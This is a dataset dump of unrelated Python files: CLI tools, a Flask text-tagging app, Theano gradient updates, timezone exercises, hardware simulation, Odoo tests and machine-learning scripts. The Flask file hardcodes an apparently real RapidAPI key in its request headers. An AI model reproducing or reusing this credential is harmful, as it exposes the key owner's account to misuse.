text stringlengths 8 6.05M |
|---|
import argparse
from common import *
def main(directory, template, overwrite):
"""
Copies the default_package to the directory passed in, the environment
variable PKG_ROOT_DIRECTORY or the current working directory.
:param directory: Directory to create for this package
:param template: Path to the template package to be used
:param overwrite: Set to True to remove directory if it exists
:return: Generates a folder on disk at 'directory'
"""
destination_dir = get_package_root(directory)
make_dir(destination_dir, template, overwrite)
parser = argparse.ArgumentParser()
parser.add_argument('-d',
'--directory',
help="""Root directory to create for this package. You can
also set the PKG_ROOT_DIRECTORY environment variable. This
directory must be an absolute path.""",
required=False,
default=None)
parser.add_argument('-t',
'--template',
help='Template package to use when creating a new package',
required=True)
parser.add_argument('-o',
'--overwrite',
help='Set to True to remove "directory" if it exists',
type=str2bool,
nargs='?',
required=False,
default='False')
if __name__ == '__main__':
args = parser.parse_args()
main(args.directory, args.template, args.overwrite)
|
from flask import Flask,render_template,request
import numpy as np
import re
import requests
import json
import csv
import pandas as pd
app = Flask(__name__)
def check(output):
url = "https://rapidapi.p.rapidapi.com/generate/"
payload = {"text": output}
#print(payload)
headers = {
'x-rapidapi-key': "537649ff73msh477f6855911bb13p129cf4jsnd5cb001617b2",
'x-rapidapi-host': "twinword-topic-tagging.p.rapidapi.com"
}
response = requests.request("GET", url, headers=headers, params=payload)
print(response.text)
return response.json()["topic"]
#return var
@app.route("/")
def home():
return render_template('home.html')
@app.route("/summarizer")
def summarizer():
return render_template('summarizer.html')
@app.route("/summarize",methods=["POST"])
def summarize():
output = request.form['output']
output = re.sub(r'[^a-zA-Z.,]'," ",output)
print(output)
#essay = check(output) # API call
with open('sample.json') as json_file: #Test using sample json
essay = json.load(json_file)
data_file = open('data_file.csv','w')
csv_writer = csv.writer(data_file)
count = 0
for emp in essay:
print(essay[emp])
essay[emp] = round(essay[emp],4)
if count == 0:
header = ["Type","Probability"]
csv_writer.writerow(header)
count += 1
d = [emp,essay[emp]]
print(d)
csv_writer.writerow(d)
data_file.close()
df = pd.read_csv('data_file.csv')
temp = df.to_dict('records')
print(temp)
colname = df.columns.values
return render_template('summary.html',records = temp,colnames = colname)
if __name__=="__main__":
app.run('localhost',5000,debug=True)
|
from .utils.nnet_named import NamedGradientStatus
from .utils.nnet import symbolic_variable_for_dimension
from numpy import array
import theano, theano.tensor as T, numpy as np
from collections import OrderedDict
REAL = theano.config.floatX
class GradientModel(object):
"""
A gradient model for updating your model with
hessian free, adagrad, or linear decay updates.
You will need to define the following attributes,
and fill them as appropriate:
# a forward method for getting errors:
projection = self.projection_function(ivector <indices/>)
# a cost function (that takes the result of projection function and labels as input)
# and returns a symbolic differentiable theano variable
self.cost_function(projection, ivector <label/>).sum()
self.params = []
self.indexed_params = set()
self._l2_regularization = True / False
self.store_max_updates = True / False
# set this theano setting
self.theano_mode = "FAST_RUN"
# set this theano setting
self.disconnected_inputs = 'ignore' / None
# if L2 is true store this parameter:
self._l2_regularization_parameter = theano.shared(np.float64(l2_regularization).astype(REAL), name='l2_regularization_parameter')
Upon initialization you must run:
self._select_update_mechanism(update_method_name)
# then to compile this mechanism:
self.create_update_fun()
The update methods expect the input to be of the form:
ivector <indices/>, ivector <labels/>
If this is not the case you can modify them as appropriate.
"""
def alternate_gradients_fun(self, params, example):
raise NotImplementedError()
def loss_fun(self, examples):
raise NotImplementedError()
def gradients_fun(self, example):
raise NotImplementedError()
def create_update_mechanisms(self):
self.update_mechanisms = {}
self._param_shapes = {}
grad_update = theano.tensor.vector('grad_update')
learning_rate = theano.tensor.vector('learning_rate')
mixed_rate = -grad_update * learning_rate
for param in self.params:
shape = param.get_value(borrow = True).shape
self._param_shapes[param] = shape
self.update_mechanisms[param] = theano.function([grad_update, learning_rate],
updates = (
{param: param + mixed_rate.reshape(shape)} if len(shape) > 0 else {param: param + mixed_rate[0]}) )
def get_parameter(self, param):
"""
Get the value of a parameter.
Inputs:
-------
param: the parameter.
Outputs:
--------
ndarray with the underlying parameter value.
"""
return param.get_value(borrow = True)
def update_parameter(self, param, grad, learning_rate):
"""
Make updates to parametes, either the tensors, matrices, or the
vocabulary.
Inputs:
-------
param: the parameter.
grad: the ndarray of the gradient for the error of this parameter
learning_rate: the per dimension learning rate for this grad (i.e.
len(grad) == len(learning_rate))
"""
self.update_mechanisms[param](grad, learning_rate)
def unravel_parameter(self, param, vector):
"""
Reconvert parameter from its vectorized shape to its
structured tensor or matrix shape.
Inputs:
-------
param: the underlying parameter
vector: the vectorized form of the parameter
Outputs:
-------
ndarray with shape equal to the parameter's and the
contents of vector.
"""
return vector.reshape(self._param_shapes[param])
def gradients(model):
gradients = NamedGradientStatus()
gradients.add_symbolic_variables(model.params)
return gradients
def ravel_gradient(self, param, gradients):
"""
Convert parameter from its original shape to a
vectorized form.
Inputs:
-------
param: the underlying parameter (Theano SharedVariable)
gradients: the NamedGradientStatus object containing
gradient updates.
Outputs:
-------
ndarray vector ndim == 1 and the
contents of appropriate gradient update.
"""
return gradients[param].ravel()
def ravel_gradients(self, param, gradients):
return array([self.ravel_gradient(param, grad) for grad in gradients])
def _skip_update_param(self, parameter):
"""
Whether to update this parameter given the current
parametrization of the model.
"""
return False
def _create_linear_batch_update_mechanism(self):
indices = T.ivector('indices')
index_length = T.ivector('indices_length')
label = T.ivector('labels')
multi_class_projections = self.batch_projection_function(indices, index_length)
batch_cost = self.batch_cost_function(multi_class_projections, label).mean()
batch_gparams = T.grad(batch_cost, self.params, disconnected_inputs = self.disconnected_inputs )
batch_updates = OrderedDict()
for param, gparam in zip(self.params, batch_gparams):
if self._skip_update_param(param):
continue
if param in self.indexed_params:
batch_updates[param] = T.inc_subtensor(param[indices], - self.learning_rate * gparam[indices])
else:
batch_updates[param] = param - self.learning_rate * gparam
self.batch_update_fun = theano.function([indices, index_length, label], batch_cost, updates = batch_updates, mode = self.theano_mode)
self.batch_gradient_fun = theano.function([indices, index_length, label], batch_gparams, mode = self.theano_mode)
self.predict_batch_proba = theano.function([indices, index_length], multi_class_projections, mode = self.theano_mode)
self.predict_batch = theano.function([indices, index_length], multi_class_projections.argmax(axis=0), mode = self.theano_mode)
def l2_regularization(self, indices):
costs = []
for param in self.params:
if param in self.indexed_params:
costs.append(self._l2_regularization_parameter * (param[indices] ** 2).sum())
else:
costs.append(self._l2_regularization_parameter * (param ** 2).sum())
return sum(costs)
def _create_linear_update_mechanism(self):
indices = T.ivector('indices')
label = T.ivector('labels')
class_projection = self.projection_function(indices)
cost = self.cost_function(class_projection, label).sum()
if self._l2_regularization:
cost += self.l2_regularization(indices)
gparams = T.grad(cost, self.params, disconnected_inputs = self.disconnected_inputs)
updates = OrderedDict()
for param, gparam in zip(self.params, gparams):
if self._skip_update_param(param):
continue
if param in self.indexed_params:
updates[param] = T.inc_subtensor(param[indices], - self.learning_rate * gparam[indices])
else:
updates[param] = param - self.learning_rate * gparam
self.update_fun = theano.function([indices, label], cost, updates = updates, mode = self.theano_mode)
self.gradient_fun = theano.function([indices, label], gparams, mode = self.theano_mode)
# to compute hessian approximations, we use alternate gradient:
alt_params = [symbolic_variable_for_dimension(param.ndim) for param in self.params]
givens = OrderedDict()
for param, alt_param in zip(self.params, alt_params):
givens[param] = alt_param
self.alternate_gradient_fun = theano.function([indices, label] + alt_params, gparams, givens = givens, mode = self.theano_mode)
if self.create_batch_methods:
self._create_linear_batch_update_mechanism()
def _create_clipped_update_mechanism(self):
self.max_update_size = theano.shared(np.zeros(len(self.params), dtype=REAL), 'max_update_size')
self.clip_range = theano.shared(np.float32(10))
indices = T.ivector('indices')
label = T.ivector('labels')
class_projection = self.projection_function(indices)
cost = self.cost_function(class_projection, label).sum()
gparams = T.grad(cost, self.params, disconnected_inputs = self.disconnected_inputs )
updates = OrderedDict()
i = 0
updates[self.max_update_size] = self.max_update_size
for param, gparam in zip(self.params, gparams):
if self._skip_update_param(param):
continue
if param in self.indexed_params:
updates[self.max_update_size] = T.set_subtensor(updates[self.max_update_size][i], T.maximum(self.max_update_size[i], gparam[indices].max()))
gparam = T.clip(gparam[indices], -self.clip_range, self.clip_range)
updates[param] = T.inc_subtensor(param[indices], - self.learning_rate * gparam)
else:
updates[self.max_update_size] = T.set_subtensor(updates[self.max_update_size][i], T.maximum(self.max_update_size[i], gparam.max()))
gparam = T.clip(gparam, -self.clip_range, self.clip_range)
updates[param] = param - self.learning_rate * gparam
i+=1
self.update_fun = theano.function([indices, label], cost, updates = updates, mode = self.theano_mode)
def _create_clipped_adagrad_update_mechanism(self):
if self.store_max_updates:
self.max_update_size = theano.shared(np.zeros(len(self.params), dtype=REAL), 'max_update_size')
self._additional_params = {}
for param in self.params:
self._additional_params[param] = theano.shared(np.ones_like(param.get_value(borrow=True)), name="%s_statistic" % (param.name))
self.clip_range = theano.shared(np.float32(10))
indices = T.ivector('indices')
label = T.ivector('labels')
class_projection = self.projection_function(indices)
cost = self.cost_function(class_projection, label).sum()
if self._l2_regularization:
cost += self.l2_regularization(indices)
gparams = T.grad(cost, self.params, disconnected_inputs = self.disconnected_inputs )
updates = OrderedDict()
reset_updates = OrderedDict()
i = 0
if self.store_max_updates:
updates[self.max_update_size] = self.max_update_size
for param, gparam in zip(self.params, gparams):
if self._skip_update_param(param):
continue
if param in self.indexed_params:
# the statistic gets increased by the squared gradient:
updates[self._additional_params[param]] = T.inc_subtensor(self._additional_params[param][indices], gparam[indices] ** 2)
reset_updates[self._additional_params[param]] = T.ones_like(self._additional_params[param])
if self.store_max_updates:
updates[self.max_update_size] = T.set_subtensor(updates[self.max_update_size][i], T.maximum(self.max_update_size[i], gparam[indices].max()))
gparam = T.clip(gparam[indices], -self.clip_range, self.clip_range)
# this normalizes the learning rate:
updates[param] = T.inc_subtensor(param[indices], - (self.learning_rate / T.sqrt(updates[self._additional_params[param]][indices])) * gparam)
else:
# the statistic gets increased by the squared gradient:
updates[self._additional_params[param]] = self._additional_params[param] + (gparam ** 2)
reset_updates[self._additional_params[param]] = T.ones_like(self._additional_params[param])
if self.store_max_updates:
updates[self.max_update_size] = T.set_subtensor(updates[self.max_update_size][i], T.maximum(self.max_update_size[i], gparam.max()))
gparam = T.clip(gparam, -self.clip_range, self.clip_range)
# this normalizes the learning rate:
updates[param] = param - (self.learning_rate / T.sqrt(updates[self._additional_params[param]])) * gparam
i+=1
self.update_fun = theano.function([indices, label], cost, updates = updates, mode = self.theano_mode)
self.reset_adagrad = theano.function([], updates = reset_updates, mode = self.theano_mode)
def _create_exterior_update_mechanism(self):
self.create_update_mechanisms()
self._create_linear_update_mechanism()
def _select_update_mechanism(self, update_function_name):
"""
Choose among these update mechanisms:
'hessian' : hessian-free updates,
'linear' : linear decay,
'clipped' : clipped strategy.
'exterior' : created gradient_fun,
alternate_gradient_fun, &
loss_fun, to power external
optimizers.
"""
update_function_name = update_function_name.lower()
if update_function_name == 'hessian':
self.create_update_fun = self._create_hessian_update_mechanism
elif update_function_name == 'linear':
self.create_update_fun = self._create_linear_update_mechanism
elif update_function_name == 'clipped':
self.create_update_fun = self._create_clipped_update_mechanism
elif update_function_name == 'adagradclipped' or update_function_name == 'clippedadagrad':
self.create_update_fun = self._create_clipped_adagrad_update_mechanism
elif update_function_name == 'exterior':
self.create_update_fun = self._create_exterior_update_mechanism
else:
raise NotImplementedError |
from __future__ import annotations
from contextlib import AsyncExitStack
from datetime import datetime
from functools import partial
from typing import Iterable
from uuid import UUID
import attrs
from anyio import to_thread
from anyio.from_thread import BlockingPortal
from ..abc import AsyncDataStore, AsyncEventBroker, DataStore, EventSource
from ..enums import ConflictPolicy
from ..eventbrokers.async_adapter import AsyncEventBrokerAdapter
from ..structures import Job, JobResult, Schedule, Task
from ..util import reentrant
@reentrant
@attrs.define(eq=False)
class AsyncDataStoreAdapter(AsyncDataStore):
original: DataStore
_portal: BlockingPortal = attrs.field(init=False)
_events: AsyncEventBroker = attrs.field(init=False)
_exit_stack: AsyncExitStack = attrs.field(init=False)
@property
def events(self) -> EventSource:
return self._events
async def __aenter__(self) -> AsyncDataStoreAdapter:
self._exit_stack = AsyncExitStack()
self._portal = BlockingPortal()
await self._exit_stack.enter_async_context(self._portal)
self._events = AsyncEventBrokerAdapter(self.original.events, self._portal)
await self._exit_stack.enter_async_context(self._events)
await to_thread.run_sync(self.original.__enter__)
self._exit_stack.push_async_exit(partial(to_thread.run_sync, self.original.__exit__))
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
await self._exit_stack.__aexit__(exc_type, exc_val, exc_tb)
async def add_task(self, task: Task) -> None:
await to_thread.run_sync(self.original.add_task, task)
async def remove_task(self, task_id: str) -> None:
await to_thread.run_sync(self.original.remove_task, task_id)
async def get_task(self, task_id: str) -> Task:
return await to_thread.run_sync(self.original.get_task, task_id)
async def get_tasks(self) -> list[Task]:
return await to_thread.run_sync(self.original.get_tasks)
async def get_schedules(self, ids: set[str] | None = None) -> list[Schedule]:
return await to_thread.run_sync(self.original.get_schedules, ids)
async def add_schedule(self, schedule: Schedule, conflict_policy: ConflictPolicy) -> None:
await to_thread.run_sync(self.original.add_schedule, schedule, conflict_policy)
async def remove_schedules(self, ids: Iterable[str]) -> None:
await to_thread.run_sync(self.original.remove_schedules, ids)
async def acquire_schedules(self, scheduler_id: str, limit: int) -> list[Schedule]:
return await to_thread.run_sync(self.original.acquire_schedules, scheduler_id, limit)
async def release_schedules(self, scheduler_id: str, schedules: list[Schedule]) -> None:
await to_thread.run_sync(self.original.release_schedules, scheduler_id, schedules)
async def get_next_schedule_run_time(self) -> datetime | None:
return await to_thread.run_sync(self.original.get_next_schedule_run_time)
async def add_job(self, job: Job) -> None:
await to_thread.run_sync(self.original.add_job, job)
async def get_jobs(self, ids: Iterable[UUID] | None = None) -> list[Job]:
return await to_thread.run_sync(self.original.get_jobs, ids)
async def acquire_jobs(self, worker_id: str, limit: int | None = None) -> list[Job]:
return await to_thread.run_sync(self.original.acquire_jobs, worker_id, limit)
async def release_job(self, worker_id: str, task_id: str, result: JobResult) -> None:
await to_thread.run_sync(self.original.release_job, worker_id, task_id, result)
async def get_job_result(self, job_id: UUID) -> JobResult | None:
return await to_thread.run_sync(self.original.get_job_result, job_id)
|
from jnius import autoclass, JavaException
import sys
PyJNIusExample = autoclass("PyJNIusExample")
pyJNIusExample = PyJNIusExample()
print "Calling instantiated addNumbers... The result is %d"%pyJNIusExample.addNumbers(13,1,20,8)
print "Calling instantiated addition... The result is %d"%pyJNIusExample.addition(13,1,20,8)
print "Calling static addition... The result is %d"%PyJNIusExample.addition(13,1,20,8)
print "----------"
print "And now let's look at some error cases"
PyJNIusExample = autoclass("PyJNIusExampleErrors")
pyJNIusExample = PyJNIusExample()
print "Calling addition on the static class with integers results in: %d"%PyJNIusExample.addition(13,1,20,8)
print "Calling addition on the static class with a String results in: %s"%PyJNIusExample.addition("Hello World")
print "Calling addition on intantiated class..."
# exception handling does not yield the same result as letting the exception fly:
# the message "No methods matching your arguments" is not exactly "jnius.JavaMultipleMethod"
pyJNIusExample.addition(13,1,20,8)
|
# Time Zones and Daylight Saving!!
# In this chapter, you'll learn to confidently tackle the time-related topic that causes people the most trouble: time zones and daylight saving. Continuing with our bike data, you'll learn how to compare clocks around the world, how to gracefully handle "spring forward" and "fall back," and how to get up-to-date timezone data from the dateutil library.
# Creating timezone aware datetimes
# In this exercise, you will practice setting timezones manually.
# # Import datetime, timezone
# from datetime import datetime, timezone
# # October 1, 2017 at 15:26:26, UTC
# dt = datetime(2017, 10, 1, 15, 26, 26, tzinfo= timezone.utc)
# # Print results
# print(dt.isoformat())
# Setting timezones
# Now that you have the hang of setting timezones one at a time, let's look at setting them for the first ten trips that W20529 took.
# timezone and timedelta have already been imported. Make the change using .replace()
# Create a timezone object corresponding to UTC-4
edt = timezone(timedelta(hours = -4))
# Loop over trips, updating the start and end datetimes to be in UTC-4
for trip in onebike_datetimes[:10]:
# Update trip['start'] and trip['end']
trip['start'] = trip['start'].replace(tzinfo = edt)
trip['end'] = trip['end'].replace(tzinfo = edt)
# What time did the bike leave in UTC?
# Having set the timezone for the first ten rides that W20529 took, let's see what time the bike left in UTC. We've already loaded the results of the previous exercise into memory.
# Loop over the trips
for trip in onebike_datetimes[:10]:
# Pull out the start and set it to UTC
dt = trip['start'].astimezone(timezone.utc)
# Print the start time in UTC
print('Original:', trip['start'], '| UTC:', dt.isoformat())
# Putting the bike trips into the right time zone
# Instead of setting the timezones for W20529 by hand, let's assign them to their IANA timezone: 'America/New_York'. Since we know their political jurisdiction, we don't need to look up their UTC offset. Python will do that for us.
# Import tz
from dateutil import tz
# Create a timezone object for Eastern Time
et = tz.gettz('America/New_York')
# Loop over trips, updating the datetimes to be in Eastern Time
for trip in onebike_datetimes[:10]:
# Update trip['start'] and trip['end']
trip['start'] = trip['start'].replace(tzinfo = et)
trip['end'] = trip['end'].replace(tzinfo = et)
# What time did the bike leave? (Global edition)
# When you need to move a datetime from one timezone into another, use .astimezone() and tz. Often you will be moving things into UTC, but for fun let's try moving things from 'America/New_York' into a few different time zones.
# Create the timezone object
uk = tz.gettz('Europe/London')
# Pull out the start of the first trip
local = onebike_datetimes[0]['start']
# What time was it in the UK?
notlocal = local.astimezone(uk)
# Print them out and see the difference
print(local.isoformat())
print(notlocal.isoformat())
# How many hours elapsed around daylight saving?
# Since our bike data takes place in the fall, you'll have to do something else to learn about the start of daylight savings time.
# Let's look at March 12, 2017, in the Eastern United States, when Daylight Saving kicked in at 2 AM.
# If you create a datetime for midnight that night, and add 6 hours to it, how much time will have elapsed?
# # Import datetime, timedelta, tz, timezone
# from datetime import datetime, timedelta, timezone
# from dateutil import tz
# # Start on March 12, 2017, midnight, then add 6 hours
# start = datetime(2017, 3, 12, tzinfo = tz.gettz('America/New_York'))
# end = start + timedelta(hours = 6)
# print(start.isoformat() + " to " + end.isoformat())
# March 29, throughout a decade
# Daylight Saving rules are complicated: they're different in different places, they change over time, and they usually start on a Sunday (and so they move around the calendar).
# For example, in the United Kingdom, as of the time this lesson was written, Daylight Saving begins on the last Sunday in March. Let's look at the UTC offset for March 29, at midnight, for the years 2000 to 2010.
# Import datetime and tz
from datetime import datetime
from dateutil import tz
# Create starting date
dt = datetime(2000, 3, 29, tzinfo = tz.gettz('Europe/London'))
# Loop over the dates, replacing the year, and print the ISO timestamp
for y in range(2000, 2011):
print(dt.replace(year=y).isoformat())
# Finding ambiguous datetimes
# At the end of lesson 2, we saw something anomalous in our bike trip duration data. Let's see if we can identify what the problem might be.
# The data has is loaded as onebike_datetimes, and tz has already been imported from dateutil.
# Loop over trips
for trip in onebike_datetimes:
# Rides with ambiguous start
if tz.datetime_ambiguous(trip['start']):
print("Ambiguous start at " + str(trip['start']))
# Rides with ambiguous end
if tz.datetime_ambiguous(trip['end']):
print("Ambiguous end at " + str(trip['end']))
# Cleaning daylight saving data with fold
# As we've just discovered, there is a ride in our data set which is being messed up by a Daylight Savings shift. Let's clean up the data set so we actually have a correct minimum ride length. We can use the fact that we know the end of the ride happened after the beginning to fix up the duration messed up by the shift out of Daylight Savings.
# Since Python does not handle tz.enfold() when doing arithmetic, we must put our datetime objects into UTC, where ambiguities have been resolved.
# onebike_datetimes is already loaded and in the right timezone. tz and timezone have been imported. Use tz.UTC for your timezone.
trip_durations = []
for trip in onebike_datetimes:
# When the start is later than the end, set the fold to be 1
if trip['start'] > trip['end']:
trip['end'] = tz.enfold(trip['end'])
# Convert to UTC
start = trip['start'].astimezone(timezone.utc)
end = trip['end'].astimezone(timezone.utc)
# Subtract the difference
trip_length_seconds = (end-start).total_seconds()
trip_durations.append(trip_length_seconds)
# Take the shortest trip duration
print("Shortest trip: " + str(min(trip_durations)))
|
import sys
sys.path.append('..')
import uuid
from src.database_tools.DatabaseAdapter import DatabaseAdapter
from src.entities.Temperature import Temperature
from datetime import datetime
class TemperatureDataService():
# constructor:
def __init__(self):
self.__tableName = "temperature"
self.__databaseAdapter = DatabaseAdapter(self.__tableName)
# private methods:
def __ParseTemperatureResult(self, row):
itemId = row[0]
timeStamp = row[1]
value = row[2]
temperature = Temperature(itemId, timeStamp, value)
return temperature
# public methods:
def GetById(self, itemId):
result = self.__databaseAdapter.Select(itemId)
temperature = self.__ParseTemperatureResult(result)
return temperature
def GetAll(self):
results = self.__databaseAdapter.SelectAll()
temperatures = []
for res in results:
temperatures.append(self.__ParseTemperatureResult(res))
return temperatures
def Save(self, temperatureItem):
if(temperatureItem.Id == uuid.UUID(int=0)):
itemId = uuid.uuid4()
else:
itemId = temperatureItem.Id
self.__databaseAdapter.Insert((str(itemId), temperatureItem.TimeStamp, temperatureItem.Value))
|
import utils
import lstm as net
import argparse
import os
import torch
import torch.nn.functional as F
import torch.optim as optim
import data_loader
from sklearn.metrics import accuracy_score
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--embedding_file', default='data/balanced/embs/tokens.txt',
help='Directory containing file with embeddings')
arg_parser.add_argument('--model_name', default='colf_classifier.pt',
help='Name of the saved model')
arg_parser.add_argument('--data_dir', default='data/balanced',
help='Directory containing the data and dataset parameters')
arg_parser.add_argument('--param_dir', default='experiments/base_model',
help='Directory containing hyperparameters')
if __name__ == '__main__':
args = arg_parser.parse_args()
path_embedding_file = args.embedding_file
model_name = args.model_name
data_dir = args.data_dir
params_dir = args.param_dir
params = utils.Params(os.path.join(data_dir,'dataset_params.json'))
params.update(os.path.join(params_dir, 'params.json'))
dl = data_loader.DataLoader('data/balanced/', params)
data = dl.load_data(['train'], 'data/balanced')
pretrained_weights = utils.load_embeddings_from_txt(dl.feature_map,
path_embedding_file)
net = net.Network(params, pretrained_weights)
learning_rate = params.learning_rate
optimizer = optim.Adam(net.parameters(), lr=learning_rate)
for epoch in range(params.num_epochs):
data_iter = dl.data_iterator(data['train'], params, shuffle=True)
total_loss = 0
total_correct = 0
# Training loop
for batch in data_iter:
sents, labels = batch
preds, single_labels = net(sents, labels)
loss = F.cross_entropy(preds, single_labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
total_loss += loss.item()
total_correct += net.get_num_correct(preds, single_labels)
print("epoch: ", epoch + 1, "total_correct: ", total_correct, "total_loss: ", total_loss, flush=True)
torch.save(net.state_dict(), model_name) |
# this is still a comment in py3
print("have to do this parentheses now") #but this is still a comment, i think
# print("block this VIM!")
|
from myhdl import *
import argparse
W0 = 9
flags_i = Signal(intbv(0)[3:])
left_i = Signal(intbv(0)[W0:])
right_i = Signal(intbv(0)[W0:])
sam_i = Signal(intbv(0)[W0:])
clk_i = Signal(bool(0))
update_i = Signal(bool(0))
update_o = Signal(bool(0))
res_o = Signal(intbv(0, min=-(2**(W0)), max=(2**(W0))))
def cliparse():
parser = argparse.ArgumentParser()
parser.add_argument("--build", default=False, action='store_true')
parser.add_argument("--test", default=False, action='store_true')
parser.add_argument("--convert", default=False, action='store_true')
args = parser.parse_args()
return args
def lift_step(flags_i,update_i,left_i,sam_i,right_i,res_o,update_o,clk_i):
@always(clk_i.posedge)
def rtl ():
if (update_i == 1):
update_o.next = 0
if (flags_i == 7):
res_o.next = sam_i.signed() - ((left_i.signed() >> 1) + (right_i.signed() >> 1))
elif (flags_i == 5):
res_o.next = sam_i.signed() + ((left_i.signed() >> 1) + (right_i.signed() >> 1))
elif (flags_i == 6):
res_o.next = sam_i.signed() + ((left_i.signed() + right_i.signed() + 2) >> 2 )
elif (flags_i == 4):
res_o.next = sam_i.signed() - ((left_i.signed() + right_i.signed() + 2) >> 2 )
else:
update_o.next = 1
return rtl
def tb(flags_i,update_i,left_i,sam_i,right_i,res_o,update_o,clk_i):
instance_lift = lift_step(flags_i,update_i,left_i,sam_i,right_i,res_o,update_o,clk_i)
@always(delay(10))
def clkgen():
clk_i.next = not clk_i
@instance
def stimulus():
left_i.next = 164
yield clk_i.posedge
sam_i.next = 160
yield clk_i.posedge
right_i.next = 170
yield clk_i.posedge
flags_i.next = 7
yield clk_i.posedge
update_i.next = 1
yield clk_i.posedge
yield clk_i.posedge
print ('%d %s %s %s %s %s' % (now(),bin(left_i,W0), bin(sam_i,W0), bin(right_i,W0), bin(flags_i,3),bin(res_o,W0)))
yield clk_i.posedge
raise StopSimulation
return instances()
def convert(args):
#toVerilog(dwt,flgs,upd,lft,sam,rht,lift,done,clock)
toVHDL(lift_step,flags_i,update_i,left_i,sam_i,right_i,res_o,update_o,clk_i)
def main():
args = cliparse()
if args.test:
tb_fsm = traceSignals(tb,flags_i,update_i,left_i,sam_i,right_i,res_o,update_o,clk_i)
sim = Simulation(tb_fsm)
sim.run()
if args.convert:
convert(args)
if __name__ == '__main__':
main()
|
# Generated by Django 3.2 on 2021-05-13 22:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0002_accounts_user_type'),
]
operations = [
migrations.AlterField(
model_name='accounts',
name='user_type',
field=models.CharField(choices=[('GENERAL_USER', 'General User'), ('BUSINESS_USER', 'Business User'), ('HEALTH_USER', 'Health User'), ('ORGANISATION_USER', 'Organisation User')], default='GENERAL_USER', max_length=17),
),
]
|
from json import load
from coala_json.reporters.ResultReporter import ResultReporter
class HtmlReporter(ResultReporter):
"""
Contain methods to produce Html test report from coala-json
coala_json is coala output in json format, usually produced by
running coala with --json option
"""
def to_output(self):
"""
Convert coala-json output to html table report
:return: html table report
"""
output_json = load(self.coala_json)['results']
table = ('<html><head><title>Test Results Report</title></head><body>'
'<table border="1"><h2>Test Result Reports</h2><tr>'
'<th>Line</th><th>Column</th><th>Severity</th>'
'<th>Message</th><th>Origin</th><th>RuleID</th>'
'<th>File</th></tr>')
for problems in output_json.values():
for problem in problems:
line = self.loader.extract_affected_line(problem)
col = self.loader.extract_affected_column(problem)
severity = self.loader.extract_severity(problem)
message = self.loader.extract_message(problem)
origin = self.loader.extract_origin(problem)
ruleid = self.loader.extract_error_code(message)
file = self.loader.extract_file(problem)
table += ('<tr><td>{}</td><td>{}</td><td>{}</td>'
'<td>{}</td><td>{}</td><td>{}</td><td>{}</td>'
'</tr>'.format(line, col, severity, message, origin,
ruleid, file))
table += '</table></body></html>\n'
return table
|
from random import random,seed,randint,shuffle
import numpy,os
colors=['R','G','Y','B']
for k in range(18):
seed(k)
m=randint(1,60)
n=randint(1,60)
testname="test"+str(k)
discs=[]
for i in range(m):
for j in range(n):
seed(i+j)
numpy.random.shuffle(colors)
x=[]
for a in colors:
# print(a,end="")
x.append(a)
discs.append(x)
# print()
if os.path.exists('./'+testname):
os.remove('./'+testname)
f=open(testname,'a')
f.write(str(m))
f.write(" ")
f.write(str(n))
f.write('\n')
for a in discs:
# print(print(*a,sep=" "))
f.write(' '.join(a))
f.write('\n') |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo.tests.common import TransactionCase
from odoo.modules.module import get_module_resource
class TestCSVFile(TransactionCase):
""" Tests for import bank statement ofx file format (account.bank.statement.import) """
def test_csv_file_import(self):
# Get OFX file content
csv_file_path = get_module_resource('account_bank_statement_import_csv', 'test_csv_file', 'test_csv.csv')
csv_file = open(csv_file_path, 'rb').read()
# Create a bank account and journal corresponding to the CSV file (same currency and account number)
bank_journal = self.env['account.journal'].create({'name': 'Bank 123456', 'code': 'BNK67', 'type': 'bank',
'bank_acc_number': '123456'})
bank_journal_id = bank_journal.id
if bank_journal.company_id.currency_id != self.env.ref("base.USD"):
bank_journal.write({'currency_id': self.env.ref("base.USD").id})
# Use an import wizard to process the file
import_wizard = self.env['base_import.import'].create({'res_model': 'account.bank.statement.line',
'file': csv_file,
'file_name': 'test_csv.csv',
'file_type': 'text/csv'})
options = {
'date_format': '%m %d %y',
'keep_matches': False,
'encoding': 'utf-8',
'fields': [],
'quoting': '"',
'bank_stmt_import': True,
'headers': True,
'separator': ';',
'float_thousand_separator': ',',
'float_decimal_separator': '.',
'advanced': False}
fields = ['date', False, 'name', 'amount', 'balance']
import_wizard.with_context(journal_id=bank_journal_id).do(fields, [], options, dryrun=False)
# Check the imported bank statement
bank_st_record = self.env['account.bank.statement'].search([('reference', '=', 'test_csv.csv')])[0]
self.assertEqual(bank_st_record.balance_start, 21699.55)
self.assertEqual(bank_st_record.balance_end_real, 23462.55)
# Check an imported bank statement line
line = bank_st_record.line_ids.filtered(lambda r: r.name == 'ACH CREDIT"CHECKFLUID INC -013015')
self.assertEqual(str(line.date), '2015-02-03')
self.assertEqual(line.amount, 2500.00)
|
import numpy as np
GAMMA = np.exp(-5)
NSUBSETSIZE = 20
BOUND = 5
NN = 1000
BIN0 = 10
BIN1 = 30
|
import pygame
pygame.init()
crash_sound = pygame.mixer.Sound("assets/sounds/crash.wav")
window_width = 800
window_height = 600
surface = pygame.display.set_mode((window_width, window_height))
clock = pygame.time.Clock()
pygame.display.set_caption("Race Car by S^#!L")
car_obj = pygame.image.load("assets/img/racecar.png")
pygame.display.set_icon(car_obj)
|
import numpy as np
import pandas as pd
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.datasets import load_boston
from sklearn.model_selection import train_test_split
# 1. 데이터
values = '3.00427759e-02 1.53808812e-04 2.66646072e-03 1.13227503e-03\
3.07877293e-02 3.79559378e-01 8.50877684e-03 9.79148714e-02\
7.55640378e-04 1.18182875e-02 3.47822800e-02 5.52293760e-03\
3.96354779e-01'
feature_importances = pd.DataFrame(list(map(float, values.split()))).sort_values(by=0)
percent = 0.25
index = sorted(feature_importances.iloc[int(np.round(len(feature_importances.index)*percent)):,:].index)
print(index)
dataset = load_boston()
x = pd.DataFrame(dataset.data).iloc[:,index]
y = pd.DataFrame(dataset.target)
print(x)
print(y)
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=44)
# 2. 모델
model = GradientBoostingRegressor()
# 3. 훈련
model.fit(x_train, y_train)
# 4. 평가, 예측
acc = model.score(x_test, y_test)
print(model.feature_importances_)
print('acc :', acc)
import matplotlib.pyplot as plt
